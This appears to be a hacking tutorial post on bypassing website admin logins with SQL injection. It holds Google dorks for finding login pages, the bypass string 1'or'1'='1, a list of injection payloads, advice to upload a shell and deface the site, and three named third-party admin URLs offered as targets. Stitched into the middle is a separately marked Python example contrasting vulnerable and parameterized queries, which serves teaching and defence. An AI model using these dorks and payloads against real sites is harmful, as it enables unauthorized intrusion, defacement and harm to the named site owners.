How to Hack website using SQL injection

Demo Of Basic SQL injection for website hacking 


SQL injection is a technique often used to attack data-driven applications. This is done by including portions of SQL statements in an entry field in an attempt to get the website to pass a newly formed rogue SQL command to the database (e.g., dump the database contents to the attacker).

SQL injection is a code injection technique that exploits a security vulnerability in an application's software. The vulnerability happens when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database. In operational environments, it has been noted that applications experience an average of 71 attempts an hour.

You might have seen hackers hacking and defacing websites, editing them with their own stuff, making posts on websites, etc. There are many methods of doing this. In this tutorial I will be showing you a very basic and simple SQLi (Structured Query Language Injection). I will show you how to find a website's admin panel using a simple Google dork and a SQL query to bypass the admin user name and password and enter the panel. When you are in the panel just find an upload option and upload your shell, then deface it.


Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php


# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above-mentioned login details and you will be in the admin panel of a website. It will not work for all the websites you will find, but it will work on most of them.
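Why that string gets past a login check, and the fix that stops it, as an added example that is not part of the original post. It assumes a hypothetical `admins` table and hypothetical login functions, using constructed data in an in-memory SQLite database:

```python
import sqlite3

PAGE_INPUT = "1'or'1'='1"  # the string the page enters in both fields

def make_db():
    # Constructed sample data: a hypothetical admins table with one account.
    # Plain-text comparison keeps the example short; real code stores salted hashes.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins (username TEXT, password TEXT)")
    db.execute("INSERT INTO admins VALUES ('admin', 'constructed-secret')")
    return db

def login_concatenated(db, user, password):
    # Vulnerable pattern: the input becomes part of the SQL text, so its quotes
    # close the string literal and its "or" becomes an SQL operator.
    sql = ("SELECT COUNT(*) FROM admins WHERE username = '" + user +
           "' AND password = '" + password + "'")
    return db.execute(sql).fetchone()[0] > 0, sql

def login_parameterized(db, user, password):
    # Hardened pattern: placeholders bind the input as values; the driver never
    # parses it as SQL, so the quotes are just characters in a string.
    sql = "SELECT COUNT(*) FROM admins WHERE username = ? AND password = ?"
    return db.execute(sql, (user, password)).fetchone()[0] > 0

def demo():
    db = make_db()
    bypassed, sql = login_concatenated(db, PAGE_INPUT, PAGE_INPUT)
    return {
        "query_built": sql,
        "concatenated_accepts_injection": bypassed,
        "parameterized_accepts_injection": login_parameterized(db, PAGE_INPUT, PAGE_INPUT),
        "parameterized_accepts_real_login": login_parameterized(db, "admin", "constructed-secret"),
        "parameterized_rejects_wrong_password": not login_parameterized(db, "admin", "wrong"),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

In the concatenated query the trailing `or'1'='1'` makes the `WHERE` clause true for every row, which is why the check passes without a valid account; with bound parameters the same input is compared as an ordinary string and matches nothing.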


Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx

Other injection queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)
